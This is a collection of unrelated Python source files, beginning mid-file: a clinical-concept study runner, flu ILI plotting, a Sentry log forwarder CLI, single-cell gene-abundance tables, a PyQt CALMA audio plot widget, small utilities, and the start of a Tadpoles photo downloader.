        sa.generate_exclusive_concepts()
    if export_study_concept_only:
        sc2closure = {}
        for sc in sa.study_concepts:
            sc2closure[sc.name] = list(sc.concept_closure)
        utils.save_json_array(sc2closure, join(folder, 'sc2closure.json'))
        logging.debug('sc2closure.json generated in %s' % folder)
    if isfile(join(folder, 'study_options.json')):
        sa.study_options = utils.load_json_data(join(folder, 'study_options.json'))
    # Flatten term->concept mappings and dump all closure concept ids to
    # all_concepts.txt for downstream tooling.
    merged_mappings = {}
    study_concept_list = []
    for c in sa.study_concepts:
        for t in c.term_to_concept:
            all_concepts = list(c.concept_closure)
            study_concept_list += all_concepts
            if len(all_concepts) > 1:
                idx = 0
                for cid in all_concepts:
                    merged_mappings['(%s) %s (%s)' % (c.name, t, idx)] = {'closure': len(all_concepts), 'mapped': cid}
                    idx += 1
            else:
                merged_mappings['(%s) %s' % (c.name, t)] = c.term_to_concept[t]
        # print c.name, c.term_to_concept, c.concept_closure
        # print json.dumps(list(c.concept_closure))
    # logging.debug('print merged mappings...')
    # print json.dumps(merged_mappings)
    # logging.debug(len(study_concept_list))
    utils.save_string('\n'.join(study_concept_list), join(folder, 'all_concepts.txt'))
    if export_study_concept_only:
        return
    # sa.gen_study_table(cohort_name, join(folder, 'result.csv'))
    # sa.gen_sample_docs(cohort_name, join(folder, 'sample_docs.json'))
    ruler = load_ruler(rule_setting_file)
    if len(ruler.skip_terms) > 0:
        sa.skip_terms = ruler.skip_terms
    return {'study_analyzer': sa, 'ruler': ruler}
def study(folder, cohort_name, sql_config_file, db_conn_file, umls_instance,
          do_one_iter=False, do_preprocessing=False,
          rule_setting_file=None, sem_idx_setting_file=None,
          concept_filter_file=None,
          retained_patients_filter=None,
          filter_obj_setting=None,
          do_disjoint_computing=True,
          export_study_concept_only=False,
          skip_closure_relations={}):
    """Run a full study: load settings, then generate result tables.

    Dispatch: one-iteration SQL mode, rule-based SQL mode, or (when
    sem_idx_setting_file is given) the Elasticsearch-backed mode.
    NOTE(review): skip_closure_relations is accepted but never used in this
    body -- confirm whether it should be forwarded to load_study_settings.
    """
    ret = load_study_settings(folder, umls_instance,
                              rule_setting_file=rule_setting_file,
                              concept_filter_file=concept_filter_file,
                              do_disjoint_computing=do_disjoint_computing,
                              export_study_concept_only=export_study_concept_only)
    sa = ret['study_analyzer']
    ruler = ret['ruler']
    if do_one_iter:
        sa.gen_study_table_in_one_iteration(cohort_name, join(folder, 'result.csv'), join(folder, 'sample_docs.json'),
                                            sql_config_file, db_conn_file)
    else:
        if sem_idx_setting_file is None:
            # SQL-backed rule-based run.
            sa.gen_study_table_with_rules(cohort_name, join(folder, 'result.csv'), join(folder, 'sample_docs.js'), ruler,
                                          join(folder, 'ruled_anns.json'), sql_config_file, db_conn_file,
                                          text_preprocessing=do_preprocessing)
        else:
            # Elasticsearch-backed run with an optional extra filter object.
            filter_obj = None
            if filter_obj_setting is not None:
                filter_obj = utils.load_json_data(filter_obj_setting)
            sa.gen_study_table_with_rules_es(cohort_name, join(folder, 'result.csv'), join(folder, 'sample_docs.js'),
                                             ruler,
                                             join(folder, 'ruled_anns.json'),
                                             sem_idx_setting_file,
                                             retained_patients_filter,
                                             filter_obj=filter_obj)
    logging.info('done')
def run_study(folder_path, no_sql_filter=None):
    """Load the study configuration JSON from ``folder_path`` and run the study.

    folder_path -- folder that contains study.json (or study_no_filter.json
        when ``no_sql_filter`` is set) plus all study inputs/outputs
    no_sql_filter -- any non-None value selects study_no_filter.json
    """
    study_config = 'study.json' if no_sql_filter is None else 'study_no_filter.json'
    if isfile(join(folder_path, study_config)):
        r = utils.load_json_data(join(folder_path, study_config))
        # optional list of patient ids to retain: first TAB column of each line
        retained_patients = None
        if 'query_patients_file' in r:
            retained_patients = []
            lines = utils.read_text_file(r['query_patients_file'])
            for l in lines:
                arr = l.split('\t')
                retained_patients.append(arr[0])
        skip_closure_relations = {}
        if 'skip_closure_relations' in r:
            skip_closure_relations = utils.load_json_data(r['skip_closure_relations'])
        study(folder_path, r['cohort'], r['sql_config'], r['db_conn'],
              concept_mapping.get_umls_client_inst(r['umls_key']),
              do_preprocessing=r['do_preprocessing'],
              rule_setting_file=r['rule_setting_file'],
              do_one_iter=r['do_one_iter'],
              sem_idx_setting_file=None if 'sem_idx_setting_file' not in r else r['sem_idx_setting_file'],
              concept_filter_file=None if 'concept_filter_file' not in r else r['concept_filter_file'],
              retained_patients_filter=retained_patients,
              filter_obj_setting=None if 'filter_obj_setting' not in r else r['filter_obj_setting'],
              do_disjoint_computing=True if 'do_disjoint' not in r else r['do_disjoint'],
              export_study_concept_only=False if 'export_study_concept' not in r else r['export_study_concept'],
              skip_closure_relations=skip_closure_relations
              )
    else:
        # report the config file actually looked for; the previous message
        # always said 'study.json' even when study_no_filter.json was expected
        logging.error('%s not found in the folder' % study_config)
if __name__ == "__main__":
reload(sys)
sys.setdefaultencoding('cp1252')
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
if 2 < len(sys.argv) > 3:
print 'the syntax is [python study_analyzer.py STUDY_DIR [-no-sql-filter]]'
else:
run_study(sys.argv[1], no_sql_filter=None if len(sys.argv) == 2 else 'yes')
| 20,282 | 6,303 |
#!/usr/bin/python
##############################################
###Python template
###Author: Elizabeth Lee
###Date: 1/25/15
###Function: time series difference in ILI percentage from CDC-based ILI baseline calculation
###Import data: SQL_export/OR_allweeks_outpatient.csv, anydiag_allweeks_outpatient.csv
###Command Line: python S_deltaILIpercent_time_CDCbaseline_v5.py
##############################################
### notes ###
# Baseline is mean percentage of patient ILI visits during non-flu weeks for the previous 3 seasons plus 2 standard deviations. A non-flu week is a period of 2+ consecutive weeks where flu was <2% of the total number of specimens lab-confirmed for flu. (cdc.gov/flu/weekly/overview.htm)
### packages/modules ###
import csv
import matplotlib.pyplot as plt
## local modules ##
import functions_v5 as fxn
### data structures ###
### functions ###
### data files ###
# NOTE(review): files are opened but never closed (Python 2 script style);
# the ILI file's header is presumably consumed inside
# fxn.week_ILIpercent_processing -- confirm, since only visitin skips it here.
ILIin = open('/home/elee/Dropbox/Elizabeth_Bansal_Lab/SDI_Data/explore/SQL_export/OR_allweeks_outpatient.csv','r')
ILIfile = csv.reader(ILIin, delimiter=',')
visitin = open('/home/elee/Dropbox/Elizabeth_Bansal_Lab/SDI_Data/explore/SQL_export/anydiag_allweeks_outpatient.csv', 'r')
visitin.readline() # rm header
visitfile = csv.reader(visitin, delimiter=',')
### called/local plotting parameters ###
ps = fxn.pseasons  # season numbers to plot (presumably; defined in functions_v5)
fw = fxn.gp_fluweeks  # number of flu weeks per season
sl = fxn.gp_seasonlabels  # legend labels, indexed by season - 2 below
colvec = fxn.gp_colors  # line colours, indexed by season - 2 below
wklab = fxn.gp_weeklabels  # x tick labels for weeks 40..39
fs = 24  # axis-label font size
fssml = 16  # small font size (unused in this script)
### program ###
# dict_wk[wk] = seasonnum
# dict_ILIpercent[Thu date of week] = ILI as percent of total visits in that week (not a cumulative measure)
# dict_deltaILIpercent53ls[s] = [deltaILI percent wk 40, wk 41, ...wk 39
# dict_refWeek[s] = date of reference week for that season
d_wk, d_ILIpercent = fxn.week_ILIpercent_processing(ILIfile, visitfile)
code = 'cdc'  # tag for the CDC-based baseline; used in labels and file name
d_cdcILIpercent53ls = fxn.ILIpercent_processing_CDCbaseline(d_wk, d_ILIpercent)
# plot delta ILI percent time series
for s in ps:
	plt.plot(xrange(53), d_cdcILIpercent53ls[s], marker = fxn.gp_marker, color = colvec[s-2], label = sl[s-2], linewidth = fxn.gp_linewidth)
# horizontal zero line marks the baseline itself
plt.hlines([0], 0, 55, colors='k', linestyles='solid', linewidth=3)
plt.xlim([0, 52])
plt.xticks(range(53)[::5], wklab[::5])
plt.xlabel('Week Number', fontsize=fs)
plt.ylabel('delta ILI perc (ref %s)' % (code), fontsize=fs)
plt.legend(loc='upper right', prop={'size':10})
plt.savefig('/home/elee/Dropbox/Elizabeth_Bansal_Lab/Manuscripts/Age_Severity/fluseverity_figs_v5/exploratory/new_baseline_definition/deltaILIpercent_time_ref%s.png' %(code), transparent=False, bbox_inches='tight', pad_inches=0)
plt.close()
# plt.show()
| 2,603 | 1,009 |
#!/usr/bin/env python
"""Standalone script for Sentry Logs"""
from __future__ import print_function
import os
import argparse
try:
from configparser import ConfigParser
except ImportError: # Python 2.7
from ConfigParser import ConfigParser # pylint: disable=import-error
# Ignore warnings caused by ``sentrylogs.<...>`` imports
# pylint: disable=no-name-in-module
def get_command_line_args():
    """Build the argument parser for the sentrylogs CLI and parse sys.argv."""
    arg_parser = argparse.ArgumentParser(
        description='Send logs to Django Sentry.')
    arg_parser.add_argument(
        '--sentryconfig', '-c', default=None,
        help='A configuration file (.ini, .yaml) of some '
             'Sentry integration to extract the Sentry DSN from')
    arg_parser.add_argument(
        '--sentrydsn', '-s', default="",
        help='The Sentry DSN string (overrides -c)')
    arg_parser.add_argument(
        '--daemonize', '-d', default=False,
        action='store_const', const=True,
        help='Run this script in background')
    arg_parser.add_argument(
        '--follow', '-f', default="all",
        help='Which logs to follow, default ALL')
    arg_parser.add_argument(
        '--nginxerrorpath', '-n', default=None,
        help='Nginx error log path')
    arg_parser.add_argument(
        '--loglevel', '-l', default=None,
        help='Minimum log level to send to sentry')
    return arg_parser.parse_args()
def process_arguments(args):
    """Deal with arguments passed on the command line.

    Resolves the Sentry DSN (config file first, then an explicit --sentrydsn
    override), exports the remaining options as environment variables, and
    optionally daemonizes the process.
    """
    if args.sentryconfig:
        print('Parsing DSN from %s' % args.sentryconfig)
        os.environ['SENTRY_DSN'] = parse_sentry_configuration(args.sentryconfig)
    if args.sentrydsn:
        print('Using the DSN %s' % args.sentrydsn)
        os.environ['SENTRY_DSN'] = args.sentrydsn
    if not os.environ.get('SENTRY_DSN'):
        raise SystemExit('No Sentry DSN found!')
    # Export the optional settings that were provided on the command line.
    for value, message, env_key in (
            (args.nginxerrorpath, 'Using the Nginx error log path %s',
             'NGINX_ERROR_PATH'),
            (args.loglevel, 'Using the sentry log level %s',
             'SENTRY_LOG_LEVEL')):
        if value:
            print(message % value)
            os.environ[env_key] = value
    # Imported only after the environment variables above are in place:
    # the settings module reads them at import time.
    from ..conf import settings  # noqa: F401; pylint: disable=unused-import
    if args.daemonize:
        print('Running process in background')
        from ..daemonize import create_daemon
        create_daemon()
def parse_sentry_configuration(filename):
    """Parse Sentry DSN out of an application or Sentry configuration file.

    Only ``.ini`` files are supported; any other extension aborts with
    SystemExit.
    """
    filetype = os.path.splitext(filename)[-1][1:].lower()
    if filetype == 'ini':  # Pyramid, Pylons
        config = ConfigParser()
        config.read(filename)
        ini_key = 'dsn'
        ini_sections = ['sentry', 'filter:raven']
        for section in ini_sections:
            if section not in config:
                continue
            print('- Using value from [{section}]:[{key}]'
                  .format(section=section, key=ini_key))
            try:
                return config[section][ini_key]
            except KeyError:
                print('- Warning: Key "{key}" not found in section '
                      '[{section}]'.format(section=section, key=ini_key))
        raise SystemExit('No DSN found in {file}. Tried sections [{sec_list}]'
                         .format(
                             file=filename,
                             sec_list='], ['.join(ini_sections),
                         ))
    if filetype == 'py':  # Django, Flask, Bottle, ...
        raise SystemExit('Parsing configuration from pure Python (Django,'
                         'Flask, Bottle, etc.) not implemented yet.')
    raise SystemExit('Configuration file type not supported for parsing: '
                     '%s' % filetype)
def launch_log_parsers():
    """Run all log file parsers that send entries to Sentry."""
    from ..parsers.nginx import Nginx
    # Only Nginx is wired up so far; add parser classes here to extend.
    parser_classes = (Nginx,)
    for parser_class in parser_classes:
        parser_class().follow_tail()
def main():
    """Main entry point of the console script."""
    cli_args = get_command_line_args()
    process_arguments(cli_args)
    print('Start sending %s logs to Sentry' % cli_args.follow)
    launch_log_parsers()
# Script entry point when executed directly (also used by setuptools scripts).
if __name__ == '__main__':
    main()
| 4,328 | 1,254 |
#%%
# Build per-experiment gene-abundance summary tables.
#
# For each (experiment, brain region) pair: load the filtered AnnData, count
# the cells expressing each transgene/endogenous marker, and write a summary
# CSV to ``<figure_save_dir>/<experiment>_<region>_all_cells_gene_abundance.csv``.
import scanpy as sc
import pandas as pd
from pathlib import Path
from vectorseq.utils import check_gene_abundance, create_dir
from vectorseq.marker_constants import BrainGenes

data_dir = Path("/spare_volume/vectorseq-data")
figure_save_dir = create_dir(data_dir / "gene_abundance")

# Endogenous marker genes appended to every experiment's transgene list.
ENDOGENOUS_GENES = [
    "Snap25",
    "Rbfox3",
    "Slc17a6",
    "Camk2a",
    "Gad1",
    "Gad2",
    "Mog",
    "Flt1",
]


def make_gene_abundance_table(experiment_id, brain_region):
    """Compute and save the gene-abundance table for one experiment/region.

    Loads ``<data_dir>/<experiment_id>/<brain_region>/all_cells/filter/adata.h5ad``,
    tabulates per-gene expressing-cell counts, read counts and mean +/- std
    abundance, writes the CSV, and returns the resulting DataFrame (indexed
    by gene) for interactive use.

    This replaces three verbatim copies of the same code, and uses a
    list-of-rows + ``pd.DataFrame`` instead of the deprecated
    ``DataFrame.append`` (removed in pandas 2.0).
    """
    run_dir = data_dir / experiment_id / brain_region
    all_cells_output_dir = create_dir(run_dir / "all_cells")
    adata = sc.read_h5ad(all_cells_output_dir / "filter" / "adata.h5ad")
    # Keep only the transgene markers actually present in this dataset.
    filtered_tg_list = [
        gene for gene in BrainGenes.TG_MARKERS if gene.upper() in adata.obs.columns
    ]
    rows = []
    for gene in filtered_tg_list + ENDOGENOUS_GENES:
        temp = check_gene_abundance(adata, gene_of_interest=gene)
        if not temp.empty:
            rows.append(
                {
                    "gene": gene,
                    "number_of_expressing_cells": temp.shape[0],
                    "number_of_reads": temp.goi_counts.sum(),
                    "abundance_in_expressing_cells": f"{round(temp.percent_count_goi.mean(),2)} +/- {round(temp.percent_count_goi.std(),2)}",
                }
            )
            print(f"{gene} detected.")
        else:
            print(f"{gene} not detected.")
    count_fractions_df = pd.DataFrame(rows).set_index("gene")
    count_fractions_df.to_csv(
        figure_save_dir
        / f"{experiment_id}_{brain_region}_all_cells_gene_abundance.csv"
    )
    return count_fractions_df


#%% [markdown]
# ## Gene Abundance Table for Experiment: 3250, Brain Region: v1
#%%
make_gene_abundance_table("3250", "v1")
#%% [markdown]
# ## Gene Abundance Table for Experiment: 3382, Brain Region: snr
#%%
make_gene_abundance_table("3382", "snr")
#%% [markdown]
# ## Gene Abundance Table for Experiment: 3454, Brain Region: sc
#%%
make_gene_abundance_table("3454", "sc")
| 4,834 | 1,845 |
from PyQt5 import QtWidgets, QtCore
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
from matplotlib import rcParams
rcParams['font.family'] = 'sans-serif'
rcParams['font.sans-serif'] = ['Cantarell']
import matplotlib.pyplot as plt
import matplotlib.patches as mpatch
import numpy as np
import operator
import matplotlib.patheffects as path_effects
class CalmaPlot(FigureCanvas):
    """
    This class provides functionality for providing graphical representations of CALMA data.

    A CalmaPlot is a matplotlib figure embedded as a PyQt5 widget; it draws a
    loudness waveform with key-change or segment rectangles overlaid.
    """
    def __init__(self, width, height, dpi, hasCalma, parent=None):
        """
        Constructs an instance of the CALMA graphing class.
        An instance of CalmaPlot inherits FigureClass, a MatPlotLib class for displaying plots in the
        text of a PyQt5 application. It generates a figure (upon which we may draw), as well as a canvas to
        place the figure upon.
        Parameters
        ----------
        width : int
            The width of the figure to be created.
            NOTE(review): currently unused -- the figure is created with a
            fixed (2, 2) size below; confirm whether that is intentional.
        height : int
            The height of the figure to be created (also currently unused).
        dpi : int
            The dots-per-inch for the figure typically 100.
        hasCalma : bool
            Whether CALMA data exists for the current query; selects which
            placeholder message is shown before any track is plotted.
        parent : QWidget, optional
            Parent widget of this canvas.
        """
        # Create Figure instance (which stores our plots)
        self.fig = Figure(figsize=(2, 2), dpi=dpi, edgecolor='blue')
        # Add an initial plot to our figure
        self.canvasGraph = self.fig.add_subplot(111)
        # Fetch colour map
        self.colourMap = self.get_colour_map()
        # Initialize figure canvas, which initializes an instance of QtWidget
        FigureCanvas.__init__(self, self.fig)
        self.setParent(parent)
        # Store reference to axes
        self.ax = self.fig.gca()
        # Hide tick labels to create default style
        self.ax.set_yticklabels([])
        self.ax.set_xticklabels([])
        # Add placeholder text
        if hasCalma:
            self.placeHolderText = self.fig.text(0.5, 0.65,'Click on a performance track for CALMA data',horizontalalignment='center',
                                             verticalalignment='center', fontsize=16)
        else:
            self.placeHolderText = self.fig.text(0.5, 0.65,'No CALMA data available for this query',horizontalalignment='center',
                                                 verticalalignment='center',
                                                 fontsize=16)
        # Make background transparent
        self.fig.patch.set_alpha(1.0)
        # Resize with window
        FigureCanvas.setSizePolicy(self, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
        FigureCanvas.updateGeometry(self)
        self.setMinimumSize(self.size())
    def get_segment_colour_map(self, features):
        """
        Generates a colour map for segment features.
        Segment labels are numeric strings ('1'..'18'); each maps to a fixed
        matplotlib colour name so segments render consistently across plots.
        Parameters
        ----------
        features : float[]
            Features information (not used here; kept for signature symmetry
            with the plot_calma_data call site).
        Returns
        ----------
        hashList : dict
            Mapping of segment label -> matplotlib colour name.
        """
        hashList = {'1' : 'Grey',
                    '2':'Red',
                    '3':'Green',
                    '4':'greenyellow',
                    '5':'Pink',
                    '6':'Orange',
                    '7':'goldenrod',
                    '8':'indianred',
                    '9':'peachpuff',
                    '10':'deepskyblue',
                    '11':'firebrick',
                    '12':'orchid',
                    '13': 'moccasin',
                    '14':'slateblue',
                    '15':'turquoise',
                    '16':'tomato',
                    '17':'darkmagenta',
                    '18':'olivedrab'}
        return hashList
    def plot_calma_data(self, loudnessValues, features, duration, type, **kwargs):
        """
        Takes CALMA data for a single track as input, and creates a plot.
        Parameters
        ----------
        loudnessValues : float[]
            An array of loudness / amplitude values.
        features : float[]
            Features information.
        duration : float
            The duration of the track.
        type : str
            Either 'segment' or 'key'; selects which colour map is used.
        **kwargs
            Optional 'title' (figure title text) and 'release' (when present,
            skips the final redraw -- redrawing here crashes with multiple
            plots).
        """
        # Replace colour map if needed
        if type == 'segment' : self.colourMap = self.get_segment_colour_map(features)
        if type == 'key' : self.colourMap = self.get_colour_map()
        # Hide placeholder text if visible
        # (KeyError: no 'title' kwarg; ValueError: text already removed)
        try:
            self.placeHolderText.remove()
            text = self.fig.text(0.5, 0.65, kwargs['title'], horizontalalignment='center',
                                 verticalalignment='center', fontsize=16)
            text.set_path_effects([path_effects.Stroke(linewidth=2, foreground='white'),
                                   path_effects.Normal()])
        except (KeyError, ValueError) as v:
            self.placeHolderText.set_text('')
        # Perform pre-processing
        nploudnessValues, duration, xSpaced, average = self.pre_processing(loudnessValues, duration)
        # Plot waveform
        self.canvasGraph.axes.cla()
        self.canvasGraph.plot(xSpaced, nploudnessValues)
        for index, key in enumerate(features):
            # Calculate graph positions
            lx, ly, rec = self.calculate_graph_element_position(features, key, index, duration, average)
            # Add annotation to plot
            self.canvasGraph.annotate(key[1], (lx, ly), weight='bold', color='Black',
                                      fontsize=7, ha='center', va='center', rotation=270)
            self.ax.add_artist(rec)
        # Set axes labels
        self.ax.set_yticklabels([])
        self.ax.set_xlabel("Time (seconds)")
        # Add colour legend for keys
        keysAsSet = list(set([x[1] for x in features]))
        patches = []
        for k in keysAsSet:
            # Plot rectangle for key changes
            # (unknown labels fall back to grey)
            try:
                fc = self.colourMap[k]
            except KeyError as keyerr:
                fc = 'grey'
            patch = mpatch.Patch(color=fc, label=k)
            patches.append(patch)
        self.canvasGraph.legend(handles=patches, bbox_to_anchor=(1.00, 1), loc=2, borderaxespad=0, fontsize=7, ncol=2)
        self.fig.subplots_adjust(left=0.00, right=0.85, top=0.95)
        # Only redraw when 'release' was NOT supplied by the caller
        try:
            kwargs['release']
        except KeyError as v:
            # Causes crash with multiple plots
            self.finishDraw()
        self.fig.patch.set_alpha(1.0)
        return
    def calculate_graph_element_position(self, keyInfo, key, index, duration, average):
        """
        Calculates the position of the rectangular patch, relative to the event duration.
        Parameters
        ----------
        keyInfo : String[]
            Track meta-data such as label.
        key : float[]
            Features information ((start_time, label) pair).
        index : int
            Index in the keys we are processing.
        duration : float
            The duration of the track.
        average : float
            Average signal amplitude value of the track.
        Return
        ----------
        lx : int
            The x position of the patch label.
        ly : int
            The y position of the patch label.
        rec : matplotlib.patches.Rectangle
            A rectangular patch object.
        """
        # Rectangle takes (lowerleftpoint=(X, Y), width, height)
        xy = (float(key[0]), self.ax.get_ylim()[1])
        # If not the latest element in the key-change data
        if index < len(keyInfo) - 1:
            # Swap width and height as we are rotating 270 degrees
            height = keyInfo[index + 1][0] - keyInfo[index][0]
        else:
            # last event extends to the end of the track
            height = duration - keyInfo[index][0]
        width = self.ax.get_ylim()[1]
        angle = 270
        # Plot rectangle for key changes
        try:
            fc = self.colourMap[key[1]]
        except KeyError as k:
            fc = 'grey'
        rec = mpatch.Rectangle(xy, width, height, angle=angle, alpha=0.5, fc=fc)
        # Calculate label positions
        rx, ry = rec.get_xy()
        lx = rx + rec.get_height() / 2.0
        ly = average
        return lx, ly, rec
    def get_colour_map(self):
        """
        Returns a colour map for key changes to ensure consistent patterns across CALMA plots.
        """
        # NOTE(review): the except clause below appears unreachable --
        # returning a dict literal cannot raise KeyError here.
        try:
            return {'C# minor' : 'Grey', 'A major' : 'Red', 'D minor' : 'Green',
                    'Eb Purple': 'greenyellow', 'D major' : 'Pink', 'G major' : 'Orange',
                    'G minor': 'goldenrod', 'A minor' : 'indianred', 'C minor' : 'peachpuff',
                    'B minor' : 'deepskyblue', 'Ab Major' : 'firebrick', 'Eb / D# minor' : 'orchid',
                    'Ab major' : 'moccasin', 'G# minor' : 'slateblue', 'Eb major' : 'turquoise',
                    'C major' : 'tomato', 'B major' : 'darkmagenta', 'F major' : 'olivedrab',
                    'F minor' : 'olive', 'Bb major' : 'lightsteelblue', 'Db major' : 'plum',
                    'Bb minor' : 'mediumspringgreen', 'E minor' : 'lightsalmon',
                    'F# / Gb major' : 'gold', 'F# minor' : 'burlywood'}
        # If colour not found to match, return grey as a last resort
        except KeyError as e:
            print('Unmatched colour: {0}'.format(e))
            return 'Grey'
    def pre_processing(self, loudnessValues, duration):
        """
        Prepares raw loudness data for plotting: clips transient samples from
        the start/end, derives the frame rate, the average amplitude (used to
        place labels on the y-axis) and evenly spaced x values in seconds.
        """
        # Clip
        loudnessValues = loudnessValues[100:-50]
        nploudnessValues = np.array(loudnessValues)
        # Frame-rate is the number of values provided, divided by the duration
        frame_rate = len(nploudnessValues) / duration
        # Calculate average for placing labels on Y-AXIS
        average = sum(loudnessValues) / len(loudnessValues)
        # Generate linear spacing for seconds in X-AXIS
        xSpaced = np.linspace(0, len(loudnessValues) / frame_rate, num=len(loudnessValues))
        return nploudnessValues, duration, xSpaced, average
    def finishDraw(self):
        """Request an asynchronous redraw of the canvas."""
        self.fig.canvas.draw_idle()
from framework.core.template_handlers import env, render_template
def not_found_view(request, **kwargs):
    """Fallback handler for unknown routes: returns a plain 404 message."""
    message = 'Page not found :('
    return message
def forbidden_view(request, **kwargs):
    """Render the 403 (forbidden) page through the shared Jinja environment."""
    ctx = kwargs.get('context')
    template = env.get_template('forbidden.html')
    return render_template(template, context=ctx)
| 319 | 95 |
import pygame
import os
class Speed:
    """Speed power-up sprite: a fixed-size image drawn at (X, 700)."""

    def __init__(self, X):
        self.X = X
        self.Y = 700  # fixed vertical spawn position
        raw_image = pygame.image.load(os.path.join("img/speed_power_up.png"))
        self.image = pygame.transform.scale(raw_image, (55, 55))

    def update_and_draw(self, screen):
        """Blit the power-up onto the given surface at its current position."""
        screen.blit(self.image, (self.X, self.Y))
import tensorflow as tf
def resize_bilinear(x, shape):
    """
    Bilinearly resize tensor ``x`` to size ``shape`` with aligned corners.

    Raises an error if the tensorflow version is too old, in order to avoid
    buggy ``align_corners`` behaviour (fixed in tensorflow 1.14).

    Parameters
    ----------
    x : tf.Tensor
        Input tensor to resize.
    shape : sequence of int
        Target spatial size.

    Raises
    ------
    NotImplementedError
        If the tensorflow version is below 1.14.

    References
    ----------
    [1]: https://github.com/tensorflow/tensorflow/issues/6720
    [2]: https://github.com/tensorflow/tensorflow/issues/33691
    """
    # Only the first two version components matter; slicing (instead of the
    # previous 3-way unpacking) also handles version strings that do not have
    # exactly three dot-separated parts (e.g. "2.0").
    major_version, minor_version = tf.__version__.split(".")[:2]
    version = int(major_version) * 100 + int(minor_version)
    if version < 114:  # before 1.14
        raise NotImplementedError(
            "Resize bilinear is buggy for tensorflow version below 1.14"
        )
    # The original had two identical branches for 1.14 and >= 1.15; the call
    # is the same in both cases, so they are collapsed here.
    return tf.image.resize_bilinear(x, shape, align_corners=True)
| 821 | 281 |
# coding: utf-8
import time
import random
import logging
from celery import Task
from banal import ensure_list
from normality import stringify
from pkg_resources import iter_entry_points
log = logging.getLogger(__name__)
# Cache of loaded entry points, keyed by entry-point group ("section").
EXTENSIONS = {}


def get_extensions(section):
    """Load, cache and return all entry points registered under ``section``."""
    registry = EXTENSIONS.setdefault(section, {})
    if not registry:
        # Populate lazily on the first request for this section.
        for entry_point in iter_entry_points(section):
            registry[entry_point.name] = entry_point.load()
    return list(registry.values())
def dict_list(data, *keys):
    """Get an entry as a list from a dict. Provide a fallback key.

    The first key present in ``data`` wins; absent keys yield ``[]``.
    """
    for candidate in keys:
        if candidate not in data:
            continue
        return ensure_list(data[candidate])
    return []
def backoff(failures=0):
    """Sleep for an exponentially growing, jittered interval.

    The exponent is capped at 7 (plus random jitter), i.e. at most ~256s.
    """
    exponent = min(7, failures) + random.random()
    sleep = 2 ** exponent
    log.debug("Back-off: %.2fs", sleep)
    time.sleep(sleep)
def html_link(text, link):
    """Render an HTML reference for ``text``, hyperlinked when ``link`` is set.

    NOTE(review): neither argument is HTML-escaped here -- callers must not
    pass untrusted markup.
    """
    label = text or '[untitled]'
    if link is None:
        return "<span class='reference'>%s</span>" % label
    return "<a class='reference' href='%s'>%s</a>" % (link, label)
def anonymize_email(name, email):
    """Generate a simple label with both the name and email of a user.

    The mailbox part of the address is masked to its first character plus
    asterisks; either part may be missing.
    """
    name = stringify(name)
    email = stringify(email)
    if email is None:
        return name
    if '@' in email:
        mailbox, domain = email.rsplit('@', 1)
        if mailbox:
            # keep the first character, star out the rest
            mailbox = mailbox[0] + '*' * (len(mailbox) - 1)
        email = '%s@%s' % (mailbox, domain)
    return email if name is None else '%s <%s>' % (name, email)
class SessionTask(Task):
    # Celery Task base class that discards the SQLAlchemy scoped session on
    # failure, so a broken/dirty session is never reused by the next task
    # executed on the same worker.
    def on_failure(self, exc, task_id, args, kwargs, einfo):
        # Imported here (not at module level) to avoid a circular import
        # with aleph.core.
        from aleph.core import db
        db.session.remove()
| 1,746 | 579 |
#!/usr/bin/env python
"""
psola.utilities.find
Implements a function that sort-of works like MATLAB's find
This is preferable to importing `find' from pylab, IMO
Author: jreinhold
Created on: Aug 18, 2017
"""
import numpy as np
def find(x):
    """
    kind-of mimics the find command in matlab,
    really created to avoid repetition in code

    Args:
        x (numpy mask): condition, e.g., x < 5

    Returns:
        indices where x is true (note: a single match yields a 0-d array)
    """
    # np.nonzero(x) is the documented equivalent of np.where(condition)
    # with a single argument
    hits = np.nonzero(x)
    return np.squeeze(hits)
| 495 | 176 |
"""This module downloads all photos/videos from tadpole to a local folder."""
import os
from os.path import abspath, dirname, join, isfile, isdir
import re
import sys
import json
import time
import pickle
import logging
import logging.config
from random import randrange
from getpass import getpass
from configparser import ConfigParser
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common.exceptions import NoSuchElementException
import requests
class DownloadError(Exception):
    """Raised when something goes wrong while downloading media files."""
class Image(object):
    """A photo/video thumbnail div scraped from the tadpoles timeline.

    Extracts the full-resolution media URL, a shortened id, and the download
    key from the div's CSS background-image style attribute.
    """
    # Matches the URL inside a CSS  background-image: url("...")  declaration
    url_re = re.compile('\\("([^"]+)')
    url_search = lambda div: Image.url_re.search(div.get_attribute("style"))
    def __init__(self, div, date=None):
        self.div = div
        # Extract URL from div, stripping the thumbnail query parameter so
        # the full-resolution asset is downloaded.  The '&thumbnail=true'
        # form must be removed FIRST: removing 'thumbnail=true' alone (as the
        # previous order did) left a dangling '&' in the URL, which also
        # leaked into the derived download key below.
        _url = Image.url_search(div).group(1)
        _url = _url.replace('&thumbnail=true', '')
        _url = _url.replace('thumbnail=true', '')
        self.url = 'https://www.tadpoles.com' + _url
        # Extract id from div
        # Shorten _id to avoid OS file length limit
        # TODO more robust id algorithm
        _id = div.get_attribute('id').split('-')[1]
        _id = _id[int(len(_id)/2):]
        self.id = _id
        # Save date (defaults to None)
        self.date = date
        # Get key (for downloading)
        _, self.key = self.url.split("key=")
    @property
    def date_text(self):
        """Zero-padded day-of-month string (defaults to '01' when unset)."""
        return "{:02d}".format(self.date if self.date is not None else 1)
class Report(object):
    """A daily-report div; exposes its text and the zero-padded day of month."""
    def __init__(self, div):
        self.div = div
        self.display_text = div.get_attribute('outerText')
        # The second line of the text looks like 'MM/DD/YYYY'; keep the day.
        day = int(self.display_text.split('\n')[1].split('/')[1])
        self.date_text = "{:02d}".format(day)
class Client:
"""The main client class responsible for downloading pictures/videos"""
COOKIE_FILE = "cookies.pkl"
ROOT_URL = "http://www.tadpoles.com/parents"
HOME_URL = "https://www.tadpoles.com/parents"
CONFIG_FILE_NAME = "conf.json"
MIN_SLEEP = 1
MAX_SLEEP = 3
MONTHS = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug', 'sep', 'oct', 'nov', 'dec']
def __init__(self, config, download_reports=True):
self.init_logging()
self.browser = None
self.cookies = None
self.req_cookies = None
self.__current_month__ = None
self.__current_year__ = None
self.current_child = None
self.download_reports = download_reports
self.config = config
